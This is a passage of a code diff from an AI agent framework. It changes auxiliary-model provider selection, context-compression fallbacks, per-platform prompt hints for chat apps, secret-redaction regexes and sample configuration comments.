| [Messaging Gateway](https://hermes-agent.nousresearch.com/docs/user-guide/messaging) | Telegram, Discord, Slack, WhatsApp, Signal, Home Assistant |
| [Security](https://hermes-agent.nousresearch.com/docs/user-guide/security) | Command approval, DM pairing, container isolation |
| [Tools & Toolsets](https://hermes-agent.nousresearch.com/docs/user-guide/features/tools) | 40+ tools, toolset system, terminal backends |
| [Skills System](https://hermes-agent.nousresearch.com/docs/user-guide/features/skills) | Procedural memory, Skills Hub, creating skills |

View File

@@ -4,7 +4,7 @@ Provides a single resolution chain so every consumer (context compression,
session search, web extraction, vision analysis, browser vision) picks up
the best available backend without duplicating fallback logic.
Resolution order for text tasks:
Resolution order for text tasks (auto mode):
1. OpenRouter (OPENROUTER_API_KEY)
2. Nous Portal (~/.hermes/auth.json active provider)
3. Custom endpoint (OPENAI_BASE_URL + OPENAI_API_KEY)
@@ -14,10 +14,19 @@ Resolution order for text tasks:
— checked via PROVIDER_REGISTRY entries with auth_type='api_key'
6. None
Resolution order for vision/multimodal tasks:
Resolution order for vision/multimodal tasks (auto mode):
1. OpenRouter
2. Nous Portal
3. None (custom endpoints can't substitute for Gemini multimodal)
3. None (steps 3-5 are skipped — they may not support multimodal)
Per-task provider overrides (e.g. AUXILIARY_VISION_PROVIDER,
CONTEXT_COMPRESSION_PROVIDER) can force a specific provider for each task:
"openrouter", "nous", "codex", or "main" (= steps 3-5).
Default "auto" follows the chains above.
Per-task model overrides (e.g. AUXILIARY_VISION_MODEL,
AUXILIARY_WEB_EXTRACT_MODEL) let callers use a different model slug
than the provider's default.
"""
import json
@@ -73,6 +82,55 @@ _CODEX_AUX_BASE_URL = "https://chatgpt.com/backend-api/codex"
# read response.choices[0].message.content. This adapter translates those
# calls to the Codex Responses API so callers don't need any changes.
def _convert_content_for_responses(content: Any) -> Any:
"""Convert chat.completions content to Responses API format.
chat.completions uses:
{"type": "text", "text": "..."}
{"type": "image_url", "image_url": {"url": "data:image/png;base64,..."}}
Responses API uses:
{"type": "input_text", "text": "..."}
{"type": "input_image", "image_url": "data:image/png;base64,..."}
If content is a plain string, it's returned as-is (the Responses API
accepts strings directly for text-only messages).
"""
if isinstance(content, str):
return content
if not isinstance(content, list):
return str(content) if content else ""
converted: List[Dict[str, Any]] = []
for part in content:
if not isinstance(part, dict):
continue
ptype = part.get("type", "")
if ptype == "text":
converted.append({"type": "input_text", "text": part.get("text", "")})
elif ptype == "image_url":
# chat.completions nests the URL: {"image_url": {"url": "..."}}
image_data = part.get("image_url", {})
url = image_data.get("url", "") if isinstance(image_data, dict) else str(image_data)
entry: Dict[str, Any] = {"type": "input_image", "image_url": url}
# Preserve detail if specified
detail = image_data.get("detail") if isinstance(image_data, dict) else None
if detail:
entry["detail"] = detail
converted.append(entry)
elif ptype in ("input_text", "input_image"):
# Already in Responses format — pass through
converted.append(part)
else:
# Unknown content type — try to preserve as text
text = part.get("text", "")
if text:
converted.append({"type": "input_text", "text": text})
return converted or ""
class _CodexCompletionsAdapter:
"""Drop-in shim that accepts chat.completions.create() kwargs and
routes them through the Codex Responses streaming API."""
@@ -86,30 +144,31 @@ class _CodexCompletionsAdapter:
model = kwargs.get("model", self._model)
temperature = kwargs.get("temperature")
# Separate system/instructions from conversation messages
# Separate system/instructions from conversation messages.
# Convert chat.completions multimodal content blocks to Responses
# API format (input_text / input_image instead of text / image_url).
instructions = "You are a helpful assistant."
input_msgs: List[Dict[str, Any]] = []
for msg in messages:
role = msg.get("role", "user")
content = msg.get("content") or ""
if role == "system":
instructions = content
instructions = content if isinstance(content, str) else str(content)
else:
input_msgs.append({"role": role, "content": content})
input_msgs.append({
"role": role,
"content": _convert_content_for_responses(content),
})
resp_kwargs: Dict[str, Any] = {
"model": model,
"instructions": instructions,
"input": input_msgs or [{"role": "user", "content": ""}],
"stream": True,
"store": False,
}
max_tokens = kwargs.get("max_output_tokens") or kwargs.get("max_completion_tokens") or kwargs.get("max_tokens")
if max_tokens is not None:
resp_kwargs["max_output_tokens"] = int(max_tokens)
if temperature is not None:
resp_kwargs["temperature"] = temperature
# Note: the Codex endpoint (chatgpt.com/backend-api/codex) does NOT
# support max_output_tokens or temperature — omit to avoid 400 errors.
# Tools support for flush_memories and similar callers
tools = kwargs.get("tools")
@@ -317,71 +376,148 @@ def _resolve_api_key_provider() -> Tuple[Optional[OpenAI], Optional[str]]:
if not api_key:
continue
# Resolve base URL (with optional env-var override)
base_url = pconfig.inference_base_url
# Kimi Code keys (sk-kimi-) need api.kimi.com/coding/v1
env_url = ""
if pconfig.base_url_env_var:
env_url = os.getenv(pconfig.base_url_env_var, "").strip()
if env_url:
base_url = env_url.rstrip("/")
if env_url:
base_url = env_url.rstrip("/")
elif provider_id == "kimi-coding" and api_key.startswith("sk-kimi-"):
base_url = "https://api.kimi.com/coding/v1"
else:
base_url = pconfig.inference_base_url
model = _API_KEY_PROVIDER_AUX_MODELS.get(provider_id, "default")
logger.debug("Auxiliary text client: %s (%s)", pconfig.name, model)
return OpenAI(api_key=api_key, base_url=base_url), model
extra = {}
if "api.kimi.com" in base_url.lower():
extra["default_headers"] = {"User-Agent": "KimiCLI/1.0"}
return OpenAI(api_key=api_key, base_url=base_url, **extra), model
return None, None
# ── Provider resolution helpers ─────────────────────────────────────────────
def _get_auxiliary_provider(task: str = "") -> str:
"""Read the provider override for a specific auxiliary task.
Checks AUXILIARY_{TASK}_PROVIDER first (e.g. AUXILIARY_VISION_PROVIDER),
then CONTEXT_{TASK}_PROVIDER (for the compression section's summary_provider),
then falls back to "auto". Returns one of: "auto", "openrouter", "nous", "main".
"""
if task:
for prefix in ("AUXILIARY_", "CONTEXT_"):
val = os.getenv(f"{prefix}{task.upper()}_PROVIDER", "").strip().lower()
if val and val != "auto":
return val
return "auto"
def _try_openrouter() -> Tuple[Optional[OpenAI], Optional[str]]:
or_key = os.getenv("OPENROUTER_API_KEY")
if not or_key:
return None, None
logger.debug("Auxiliary client: OpenRouter")
return OpenAI(api_key=or_key, base_url=OPENROUTER_BASE_URL,
default_headers=_OR_HEADERS), _OPENROUTER_MODEL
def _try_nous() -> Tuple[Optional[OpenAI], Optional[str]]:
nous = _read_nous_auth()
if not nous:
return None, None
global auxiliary_is_nous
auxiliary_is_nous = True
logger.debug("Auxiliary client: Nous Portal")
return (
OpenAI(api_key=_nous_api_key(nous), base_url=_nous_base_url()),
_NOUS_MODEL,
)
def _try_custom_endpoint() -> Tuple[Optional[OpenAI], Optional[str]]:
custom_base = os.getenv("OPENAI_BASE_URL")
custom_key = os.getenv("OPENAI_API_KEY")
if not custom_base or not custom_key:
return None, None
model = os.getenv("OPENAI_MODEL") or os.getenv("LLM_MODEL") or "gpt-4o-mini"
logger.debug("Auxiliary client: custom endpoint (%s)", model)
return OpenAI(api_key=custom_key, base_url=custom_base), model
def _try_codex() -> Tuple[Optional[Any], Optional[str]]:
codex_token = _read_codex_access_token()
if not codex_token:
return None, None
logger.debug("Auxiliary client: Codex OAuth (%s via Responses API)", _CODEX_AUX_MODEL)
real_client = OpenAI(api_key=codex_token, base_url=_CODEX_AUX_BASE_URL)
return CodexAuxiliaryClient(real_client, _CODEX_AUX_MODEL), _CODEX_AUX_MODEL
def _resolve_forced_provider(forced: str) -> Tuple[Optional[OpenAI], Optional[str]]:
"""Resolve a specific forced provider. Returns (None, None) if creds missing."""
if forced == "openrouter":
client, model = _try_openrouter()
if client is None:
logger.warning("auxiliary.provider=openrouter but OPENROUTER_API_KEY not set")
return client, model
if forced == "nous":
client, model = _try_nous()
if client is None:
logger.warning("auxiliary.provider=nous but Nous Portal not configured (run: hermes login)")
return client, model
if forced == "codex":
client, model = _try_codex()
if client is None:
logger.warning("auxiliary.provider=codex but no Codex OAuth token found (run: hermes model)")
return client, model
if forced == "main":
# "main" = skip OpenRouter/Nous, use the main chat model's credentials.
for try_fn in (_try_custom_endpoint, _try_codex, _resolve_api_key_provider):
client, model = try_fn()
if client is not None:
return client, model
logger.warning("auxiliary.provider=main but no main endpoint credentials found")
return None, None
# Unknown provider name — fall through to auto
logger.warning("Unknown auxiliary.provider=%r, falling back to auto", forced)
return None, None
def _resolve_auto() -> Tuple[Optional[OpenAI], Optional[str]]:
"""Full auto-detection chain: OpenRouter → Nous → custom → Codex → API-key → None."""
for try_fn in (_try_openrouter, _try_nous, _try_custom_endpoint,
_try_codex, _resolve_api_key_provider):
client, model = try_fn()
if client is not None:
return client, model
logger.debug("Auxiliary client: none available")
return None, None
# ── Public API ──────────────────────────────────────────────────────────────
def get_text_auxiliary_client() -> Tuple[Optional[OpenAI], Optional[str]]:
"""Return (client, model_slug) for text-only auxiliary tasks.
def get_text_auxiliary_client(task: str = "") -> Tuple[Optional[OpenAI], Optional[str]]:
"""Return (client, default_model_slug) for text-only auxiliary tasks.
Falls through OpenRouter -> Nous Portal -> custom endpoint -> Codex OAuth
-> direct API-key providers -> (None, None).
Args:
task: Optional task name ("compression", "web_extract") to check
for a task-specific provider override.
Callers may override the returned model with a per-task env var
(e.g. CONTEXT_COMPRESSION_MODEL, AUXILIARY_WEB_EXTRACT_MODEL).
"""
# 1. OpenRouter
or_key = os.getenv("OPENROUTER_API_KEY")
if or_key:
logger.debug("Auxiliary text client: OpenRouter")
return OpenAI(api_key=or_key, base_url=OPENROUTER_BASE_URL,
default_headers=_OR_HEADERS), _OPENROUTER_MODEL
# 2. Nous Portal
nous = _read_nous_auth()
if nous:
global auxiliary_is_nous
auxiliary_is_nous = True
logger.debug("Auxiliary text client: Nous Portal")
return (
OpenAI(api_key=_nous_api_key(nous), base_url=_nous_base_url()),
_NOUS_MODEL,
)
# 3. Custom endpoint (both base URL and key must be set)
custom_base = os.getenv("OPENAI_BASE_URL")
custom_key = os.getenv("OPENAI_API_KEY")
if custom_base and custom_key:
model = os.getenv("OPENAI_MODEL") or os.getenv("LLM_MODEL") or "gpt-4o-mini"
logger.debug("Auxiliary text client: custom endpoint (%s)", model)
return OpenAI(api_key=custom_key, base_url=custom_base), model
# 4. Codex OAuth -- uses the Responses API (only endpoint the token
# can access), wrapped to look like a chat.completions client.
codex_token = _read_codex_access_token()
if codex_token:
logger.debug("Auxiliary text client: Codex OAuth (%s via Responses API)", _CODEX_AUX_MODEL)
real_client = OpenAI(api_key=codex_token, base_url=_CODEX_AUX_BASE_URL)
return CodexAuxiliaryClient(real_client, _CODEX_AUX_MODEL), _CODEX_AUX_MODEL
# 5. Direct API-key providers (z.ai/GLM, Kimi/Moonshot, MiniMax, etc.)
api_client, api_model = _resolve_api_key_provider()
if api_client is not None:
return api_client, api_model
# 6. Nothing available
logger.debug("Auxiliary text client: none available")
return None, None
forced = _get_auxiliary_provider(task)
if forced != "auto":
return _resolve_forced_provider(forced)
return _resolve_auto()
def get_async_text_auxiliary_client():
def get_async_text_auxiliary_client(task: str = ""):
"""Return (async_client, model_slug) for async consumers.
For standard providers returns (AsyncOpenAI, model). For Codex returns
@@ -390,7 +526,7 @@ def get_async_text_auxiliary_client():
"""
from openai import AsyncOpenAI
sync_client, model = get_text_auxiliary_client()
sync_client, model = get_text_auxiliary_client(task)
if sync_client is None:
return None, None
@@ -403,33 +539,33 @@ def get_async_text_auxiliary_client():
}
if "openrouter" in str(sync_client.base_url).lower():
async_kwargs["default_headers"] = dict(_OR_HEADERS)
elif "api.kimi.com" in str(sync_client.base_url).lower():
async_kwargs["default_headers"] = {"User-Agent": "KimiCLI/1.0"}
return AsyncOpenAI(**async_kwargs), model
def get_vision_auxiliary_client() -> Tuple[Optional[OpenAI], Optional[str]]:
"""Return (client, model_slug) for vision/multimodal auxiliary tasks.
"""Return (client, default_model_slug) for vision/multimodal auxiliary tasks.
Only OpenRouter and Nous Portal qualify — custom endpoints cannot
substitute for Gemini multimodal.
Checks AUXILIARY_VISION_PROVIDER for a forced provider, otherwise
auto-detects. Callers may override the returned model with
AUXILIARY_VISION_MODEL.
In auto mode, only providers known to support multimodal are tried:
OpenRouter, Nous Portal, and Codex OAuth (gpt-5.3-codex supports
vision via the Responses API). Custom endpoints and API-key
providers are skipped — they may not handle vision input. To use
them, set AUXILIARY_VISION_PROVIDER explicitly.
"""
# 1. OpenRouter
or_key = os.getenv("OPENROUTER_API_KEY")
if or_key:
logger.debug("Auxiliary vision client: OpenRouter")
return OpenAI(api_key=or_key, base_url=OPENROUTER_BASE_URL,
default_headers=_OR_HEADERS), _OPENROUTER_MODEL
# 2. Nous Portal
nous = _read_nous_auth()
if nous:
logger.debug("Auxiliary vision client: Nous Portal")
return (
OpenAI(api_key=_nous_api_key(nous), base_url=_nous_base_url()),
_NOUS_MODEL,
)
# 3. Nothing suitable
logger.debug("Auxiliary vision client: none available")
forced = _get_auxiliary_provider("vision")
if forced != "auto":
return _resolve_forced_provider(forced)
# Auto: only multimodal-capable providers
for try_fn in (_try_openrouter, _try_nous, _try_codex):
client, model = try_fn()
if client is not None:
return client, model
logger.debug("Auxiliary vision client: none available (auto only tries OpenRouter/Nous/Codex)")
return None, None

View File

@@ -7,7 +7,7 @@ protecting head and tail context.
import logging
import os
from typing import Any, Dict, List
from typing import Any, Dict, List, Optional
from agent.auxiliary_client import get_text_auxiliary_client
from agent.model_metadata import (
@@ -53,7 +53,7 @@ class ContextCompressor:
self.last_completion_tokens = 0
self.last_total_tokens = 0
self.client, default_model = get_text_auxiliary_client()
self.client, default_model = get_text_auxiliary_client("compression")
self.summary_model = summary_model_override or default_model
def update_from_response(self, usage: Dict[str, Any]):
@@ -82,11 +82,14 @@ class ContextCompressor:
"compression_count": self.compression_count,
}
def _generate_summary(self, turns_to_summarize: List[Dict[str, Any]]) -> str:
"""Generate a concise summary of conversation turns using a fast model."""
if not self.client:
return "[CONTEXT SUMMARY]: Previous conversation turns have been compressed to save space. The assistant performed various actions and received responses."
def _generate_summary(self, turns_to_summarize: List[Dict[str, Any]]) -> Optional[str]:
"""Generate a concise summary of conversation turns.
Tries the auxiliary model first, then falls back to the user's main
model. Returns None if all attempts fail — the caller should drop
the middle turns without a summary rather than inject a useless
placeholder.
"""
parts = []
for msg in turns_to_summarize:
role = msg.get("role", "unknown")
@@ -117,28 +120,28 @@ TURNS TO SUMMARIZE:
Write only the summary, starting with "[CONTEXT SUMMARY]:" prefix."""
try:
return self._call_summary_model(self.client, self.summary_model, prompt)
except Exception as e:
logging.warning(f"Failed to generate context summary with auxiliary model: {e}")
# 1. Try the auxiliary model (cheap/fast)
if self.client:
try:
return self._call_summary_model(self.client, self.summary_model, prompt)
except Exception as e:
logging.warning(f"Failed to generate context summary with auxiliary model: {e}")
# Fallback: try the main model's endpoint. This handles the common
# case where the user switched providers (e.g. OpenRouter → local LLM)
# but a stale API key causes the auxiliary client to pick the old
# provider which then fails (402, auth error, etc.).
fallback_client, fallback_model = self._get_fallback_client()
if fallback_client is not None:
try:
logger.info("Retrying context summary with fallback client (%s)", fallback_model)
summary = self._call_summary_model(fallback_client, fallback_model, prompt)
# Success — swap in the working client for future compressions
self.client = fallback_client
self.summary_model = fallback_model
return summary
except Exception as fallback_err:
logging.warning(f"Fallback summary model also failed: {fallback_err}")
# 2. Fallback: try the user's main model endpoint
fallback_client, fallback_model = self._get_fallback_client()
if fallback_client is not None:
try:
logger.info("Retrying context summary with main model (%s)", fallback_model)
summary = self._call_summary_model(fallback_client, fallback_model, prompt)
self.client = fallback_client
self.summary_model = fallback_model
return summary
except Exception as fallback_err:
logging.warning(f"Main model summary also failed: {fallback_err}")
return "[CONTEXT SUMMARY]: Previous conversation turns have been compressed. The assistant performed tool calls and received responses."
# 3. All models failed — return None so the caller drops turns without a summary
logging.warning("Context compression: no model available for summary. Middle turns will be dropped without summary.")
return None
def _call_summary_model(self, client, model: str, prompt: str) -> str:
"""Make the actual LLM call to generate a summary. Raises on failure."""
@@ -326,25 +329,6 @@ Write only the summary, starting with "[CONTEXT SUMMARY]:" prefix."""
print(f"\n📦 Context compression triggered ({display_tokens:,} tokens ≥ {self.threshold_tokens:,} threshold)")
print(f" 📊 Model context limit: {self.context_length:,} tokens ({self.threshold_percent*100:.0f}% = {self.threshold_tokens:,})")
# Truncation fallback when no auxiliary model is available
if self.client is None:
print("⚠️ Context compression: no auxiliary model available. Falling back to message truncation.")
# Keep system message(s) at the front and the protected tail;
# simply drop the oldest non-system messages until under threshold.
kept = []
for msg in messages:
if msg.get("role") == "system":
kept.append(msg.copy())
else:
break
tail = messages[-self.protect_last_n:]
kept.extend(m.copy() for m in tail)
self.compression_count += 1
kept = self._sanitize_tool_pairs(kept)
if not self.quiet_mode:
print(f" ✂️ Truncated: {len(messages)}{len(kept)} messages (dropped middle turns)")
return kept
if not self.quiet_mode:
print(f" 🗜️ Summarizing turns {compress_start+1}-{compress_end} ({len(turns_to_summarize)} turns)")
@@ -357,7 +341,13 @@ Write only the summary, starting with "[CONTEXT SUMMARY]:" prefix."""
msg["content"] = (msg.get("content") or "") + "\n\n[Note: Some earlier conversation turns may be summarized to preserve context space.]"
compressed.append(msg)
compressed.append({"role": "user", "content": summary})
if summary:
last_head_role = messages[compress_start - 1].get("role", "user") if compress_start > 0 else "user"
summary_role = "user" if last_head_role in ("assistant", "tool") else "assistant"
compressed.append({"role": summary_role, "content": summary})
else:
if not self.quiet_mode:
print(" ⚠️ No summary model available — middle turns dropped without summary")
for i in range(compress_end, n_messages):
compressed.append(messages[i].copy())

View File

@@ -66,7 +66,8 @@ DEFAULT_AGENT_IDENTITY = (
"range of tasks including answering questions, writing and editing code, "
"analyzing information, creative work, and executing actions via your tools. "
"You communicate clearly, admit uncertainty when appropriate, and prioritize "
"being genuinely useful over being verbose unless otherwise directed below."
"being genuinely useful over being verbose unless otherwise directed below. "
"Be targeted and efficient in your exploration and investigations."
)
MEMORY_GUIDANCE = (
@@ -102,12 +103,33 @@ PLATFORM_HINTS = {
"You are on a text messaging communication platform, Telegram. "
"Please do not use markdown as it does not render. "
"You can send media files natively: to deliver a file to the user, "
"include MEDIA:/absolute/path/to/file in your response. Audio "
"(.ogg) sends as voice bubbles. You can also include image URLs "
"in markdown format ![alt](url) and they will be sent as native photos."
"include MEDIA:/absolute/path/to/file in your response. Images "
"(.png, .jpg, .webp) appear as photos, audio (.ogg) sends as voice "
"bubbles, and videos (.mp4) play inline. You can also include image "
"URLs in markdown format ![alt](url) and they will be sent as native photos."
),
"discord": (
"You are in a Discord server or group chat communicating with your user."
"You are in a Discord server or group chat communicating with your user. "
"You can send media files natively: include MEDIA:/absolute/path/to/file "
"in your response. Images (.png, .jpg, .webp) are sent as photo "
"attachments, audio as file attachments. You can also include image URLs "
"in markdown format ![alt](url) and they will be sent as attachments."
),
"slack": (
"You are in a Slack workspace communicating with your user. "
"You can send media files natively: include MEDIA:/absolute/path/to/file "
"in your response. Images (.png, .jpg, .webp) are uploaded as photo "
"attachments, audio as file attachments. You can also include image URLs "
"in markdown format ![alt](url) and they will be uploaded as attachments."
),
"signal": (
"You are on a text messaging communication platform, Signal. "
"Please do not use markdown as it does not render. "
"You can send media files natively: to deliver a file to the user, "
"include MEDIA:/absolute/path/to/file in your response. Images "
"(.png, .jpg, .webp) appear as photos, audio as attachments, and other "
"files arrive as downloadable documents. You can also include image "
"URLs in markdown format ![alt](url) and they will be sent as photos."
),
"cli": (
"You are a CLI AI Agent. Try not to use markdown but simple text "
@@ -173,6 +195,8 @@ def build_skills_system_prompt() -> str:
# Collect skills with descriptions, grouped by category
# Each entry: (skill_name, description)
# Supports sub-categories: skills/mlops/training/axolotl/SKILL.md
# → category "mlops/training", skill "axolotl"
skills_by_category: dict[str, list[tuple[str, str]]] = {}
for skill_file in skills_dir.rglob("SKILL.md"):
# Skip skills incompatible with the current OS platform
@@ -181,8 +205,13 @@ def build_skills_system_prompt() -> str:
rel_path = skill_file.relative_to(skills_dir)
parts = rel_path.parts
if len(parts) >= 2:
category = parts[0]
# Category is everything between skills_dir and the skill folder
# e.g. parts = ("mlops", "training", "axolotl", "SKILL.md")
# → category = "mlops/training", skill_name = "axolotl"
# e.g. parts = ("github", "github-auth", "SKILL.md")
# → category = "github", skill_name = "github-auth"
skill_name = parts[-2]
category = "/".join(parts[:-2]) if len(parts) > 2 else parts[0]
else:
category = "general"
skill_name = skill_file.parent.name
@@ -193,9 +222,11 @@ def build_skills_system_prompt() -> str:
return ""
# Read category-level descriptions from DESCRIPTION.md
# Checks both the exact category path and parent directories
category_descriptions = {}
for category in skills_by_category:
desc_file = skills_dir / category / "DESCRIPTION.md"
cat_path = Path(category)
desc_file = skills_dir / cat_path / "DESCRIPTION.md"
if desc_file.exists():
try:
content = desc_file.read_text(encoding="utf-8")

View File

@@ -8,6 +8,7 @@ the first 6 and last 4 characters for debuggability.
"""
import logging
import os
import re
from typing import Optional
@@ -15,7 +16,7 @@ logger = logging.getLogger(__name__)
# Known API key prefixes -- match the prefix + contiguous token chars
_PREFIX_PATTERNS = [
r"sk-[A-Za-z0-9_-]{10,}", # OpenAI / OpenRouter
r"sk-[A-Za-z0-9_-]{10,}", # OpenAI / OpenRouter / Anthropic (sk-ant-*)
r"ghp_[A-Za-z0-9]{10,}", # GitHub PAT (classic)
r"github_pat_[A-Za-z0-9_]{10,}", # GitHub PAT (fine-grained)
r"xox[baprs]-[A-Za-z0-9-]{10,}", # Slack tokens
@@ -25,6 +26,18 @@ _PREFIX_PATTERNS = [
r"fc-[A-Za-z0-9]{10,}", # Firecrawl
r"bb_live_[A-Za-z0-9_-]{10,}", # BrowserBase
r"gAAAA[A-Za-z0-9_=-]{20,}", # Codex encrypted tokens
r"AKIA[A-Z0-9]{16}", # AWS Access Key ID
r"sk_live_[A-Za-z0-9]{10,}", # Stripe secret key (live)
r"sk_test_[A-Za-z0-9]{10,}", # Stripe secret key (test)
r"rk_live_[A-Za-z0-9]{10,}", # Stripe restricted key
r"SG\.[A-Za-z0-9_-]{10,}", # SendGrid API key
r"hf_[A-Za-z0-9]{10,}", # HuggingFace token
r"r8_[A-Za-z0-9]{10,}", # Replicate API token
r"npm_[A-Za-z0-9]{10,}", # npm access token
r"pypi-[A-Za-z0-9_-]{10,}", # PyPI API token
r"dop_v1_[A-Za-z0-9]{10,}", # DigitalOcean PAT
r"doo_v1_[A-Za-z0-9]{10,}", # DigitalOcean OAuth
r"am_[A-Za-z0-9_-]{10,}", # AgentMail API key
]
# ENV assignment patterns: KEY=value where KEY contains a secret-like name
@@ -52,6 +65,22 @@ _TELEGRAM_RE = re.compile(
r"(bot)?(\d{8,}):([-A-Za-z0-9_]{30,})",
)
# Private key blocks: -----BEGIN RSA PRIVATE KEY----- ... -----END RSA PRIVATE KEY-----
_PRIVATE_KEY_RE = re.compile(
r"-----BEGIN[A-Z ]*PRIVATE KEY-----[\s\S]*?-----END[A-Z ]*PRIVATE KEY-----"
)
# Database connection strings: protocol://user:PASSWORD@host
# Catches postgres, mysql, mongodb, redis, amqp URLs and redacts the password
_DB_CONNSTR_RE = re.compile(
r"((?:postgres(?:ql)?|mysql|mongodb(?:\+srv)?|redis|amqp)://[^:]+:)([^@]+)(@)",
re.IGNORECASE,
)
# E.164 phone numbers: +<country><number>, 7-15 digits
# Negative lookahead prevents matching hex strings or identifiers
_SIGNAL_PHONE_RE = re.compile(r"(\+[1-9]\d{6,14})(?![A-Za-z0-9])")
# Compile known prefix patterns into one alternation
_PREFIX_RE = re.compile(
r"(?<![A-Za-z0-9_-])(" + "|".join(_PREFIX_PATTERNS) + r")(?![A-Za-z0-9_-])"
@@ -69,9 +98,12 @@ def redact_sensitive_text(text: str) -> str:
"""Apply all redaction patterns to a block of text.
Safe to call on any string -- non-matching text passes through unchanged.
Disabled when security.redact_secrets is false in config.yaml.
"""
if not text:
return text
if os.getenv("HERMES_REDACT_SECRETS", "").lower() in ("0", "false", "no", "off"):
return text
# Known prefixes (sk-, ghp_, etc.)
text = _PREFIX_RE.sub(lambda m: _mask_token(m.group(1)), text)
@@ -101,6 +133,20 @@ def redact_sensitive_text(text: str) -> str:
return f"{prefix}{digits}:***"
text = _TELEGRAM_RE.sub(_redact_telegram, text)
# Private key blocks
text = _PRIVATE_KEY_RE.sub("[REDACTED PRIVATE KEY]", text)
# Database connection string passwords
text = _DB_CONNSTR_RE.sub(lambda m: f"{m.group(1)}***{m.group(3)}", text)
# E.164 phone numbers (Signal, WhatsApp)
def _redact_phone(m):
phone = m.group(1)
if len(phone) <= 8:
return phone[:2] + "****" + phone[-2:]
return phone[:4] + "****" + phone[-4:]
text = _SIGNAL_PHONE_RE.sub(_redact_phone, text)
return text

View File

@@ -1112,7 +1112,7 @@ def main(
batch_size: int = None,
run_name: str = None,
distribution: str = "default",
model: str = "anthropic/claude-sonnet-4-20250514",
model: str = "anthropic/claude-sonnet-4.6",
api_key: str = None,
base_url: str = "https://openrouter.ai/api/v1",
max_turns: int = 10,
@@ -1155,7 +1155,7 @@ def main(
providers_order (str): Comma-separated list of OpenRouter providers to try in order (e.g. "anthropic,openai,google")
provider_sort (str): Sort providers by "price", "throughput", or "latency" (OpenRouter only)
max_tokens (int): Maximum tokens for model responses (optional, uses model default if not set)
reasoning_effort (str): OpenRouter reasoning effort level: "xhigh", "high", "medium", "low", "minimal", "none" (default: "xhigh")
reasoning_effort (str): OpenRouter reasoning effort level: "xhigh", "high", "medium", "low", "minimal", "none" (default: "medium")
reasoning_disabled (bool): Completely disable reasoning/thinking tokens (default: False)
prefill_messages_file (str): Path to JSON file containing prefill messages (list of {role, content} dicts)
max_samples (int): Only process the first N samples from the dataset (optional, processes all if not set)
@@ -1216,7 +1216,7 @@ def main(
providers_order_list = [p.strip() for p in providers_order.split(",")] if providers_order else None
# Build reasoning_config from CLI flags
# --reasoning_disabled takes priority, then --reasoning_effort, then default (xhigh)
# --reasoning_disabled takes priority, then --reasoning_effort, then default (medium)
reasoning_config = None
if reasoning_disabled:
# Completely disable reasoning/thinking tokens

View File

@@ -50,6 +50,16 @@ model:
# # Data policy: "allow" (default) or "deny" to exclude providers that may store data
# # data_collection: "deny"
# =============================================================================
# Git Worktree Isolation
# =============================================================================
# When enabled, each CLI session creates an isolated git worktree so multiple
# agents can work on the same repo concurrently without file collisions.
# Equivalent to always passing --worktree / -w on the command line.
#
# worktree: true # Always create a worktree when in a git repo
# worktree: false # Default — only create when -w flag is passed
# =============================================================================
# Terminal Tool Configuration
# =============================================================================
@@ -199,8 +209,58 @@ compression:
threshold: 0.85
# Model to use for generating summaries (fast/cheap recommended)
# This model compresses the middle turns into a concise summary
# This model compresses the middle turns into a concise summary.
# IMPORTANT: it receives the full middle section of the conversation, so it
# MUST support a context length at least as large as your main model's.
summary_model: "google/gemini-3-flash-preview"
# Provider for the summary model (default: "auto")
# Options: "auto", "openrouter", "nous", "main"
# summary_provider: "auto"
# =============================================================================
# Auxiliary Models (Advanced — Experimental)
# =============================================================================
# Hermes uses lightweight "auxiliary" models for side tasks: image analysis,
# browser screenshot analysis, web page summarization, and context compression.
#
# By default these use Gemini Flash via OpenRouter or Nous Portal and are
# auto-detected from your credentials. You do NOT need to change anything
# here for normal usage.
#
# WARNING: Overriding these with providers other than OpenRouter or Nous Portal
# is EXPERIMENTAL and may not work. Not all models/providers support vision,
# produce usable summaries, or accept the same API format. Change at your own
# risk — if things break, reset to "auto" / empty values.
#
# Each task has its own provider + model pair so you can mix providers.
# For example: OpenRouter for vision (needs multimodal), but your main
# local endpoint for compression (just needs text).
#
# Provider options:
# "auto" - Best available: OpenRouter → Nous Portal → main endpoint (default)
# "openrouter" - Force OpenRouter (requires OPENROUTER_API_KEY)
# "nous" - Force Nous Portal (requires: hermes login)
# "codex" - Force Codex OAuth (requires: hermes model → Codex).
# Uses gpt-5.3-codex which supports vision.
# "main" - Use your custom endpoint (OPENAI_BASE_URL + OPENAI_API_KEY).
# Works with OpenAI API, local models, or any OpenAI-compatible
# endpoint. Also falls back to Codex OAuth and API-key providers.
#
# Model: leave empty to use the provider's default. When empty, OpenRouter
# uses "google/gemini-3-flash-preview" and Nous uses "gemini-3-flash".
# Other providers pick a sensible default automatically.
#
# auxiliary:
# # Image analysis: vision_analyze tool + browser screenshots
# vision:
# provider: "auto"
# model: "" # e.g. "google/gemini-2.5-flash", "openai/gpt-4o"
#
# # Web page scraping / summarization + browser page text extraction
# web_extract:
# provider: "auto"
# model: ""
# =============================================================================
# Persistent Memory
@@ -285,7 +345,7 @@ agent:
# Reasoning effort level (OpenRouter and Nous Portal)
# Controls how much "thinking" the model does before responding.
# Options: "xhigh" (max), "high", "medium", "low", "minimal", "none" (disable)
reasoning_effort: "xhigh"
reasoning_effort: "medium"
# Predefined personalities (use with /personality command)
personalities:
@@ -495,6 +555,21 @@ toolsets:
# args: ["-y", "@modelcontextprotocol/server-github"]
# env:
# GITHUB_PERSONAL_ACCESS_TOKEN: "ghp_..."
#
# Sampling (server-initiated LLM requests) — enabled by default.
# Per-server config under the 'sampling' key:
# analysis:
# command: npx
# args: ["-y", "analysis-server"]
# sampling:
# enabled: true # default: true
# model: "gemini-3-flash" # override model (optional)
# max_tokens_cap: 4096 # max tokens per request
# timeout: 30 # LLM call timeout (seconds)
# max_rpm: 10 # max requests per minute
# allowed_models: [] # model whitelist (empty = all)
# max_tool_rounds: 5 # tool loop limit (0 = disable)
# log_level: "info" # audit verbosity
# =============================================================================
# Voice Transcription (Speech-to-Text)
@@ -575,3 +650,8 @@ display:
# verbose: Full args, results, and debug logs (same as /verbose)
# Toggle at runtime with /verbose in the CLI
tool_progress: all
# Play terminal bell when agent finishes a response.
# Useful for long-running tasks — your terminal will ding when the agent is done.
# Works over SSH. Most terminals can be configured to flash the taskbar or play a sound.
bell_on_complete: false

1118
cli.py

File diff suppressed because it is too large Load Diff

View File

@@ -98,6 +98,7 @@ def _deliver_result(job: dict, content: str) -> None:
"discord": Platform.DISCORD,
"slack": Platform.SLACK,
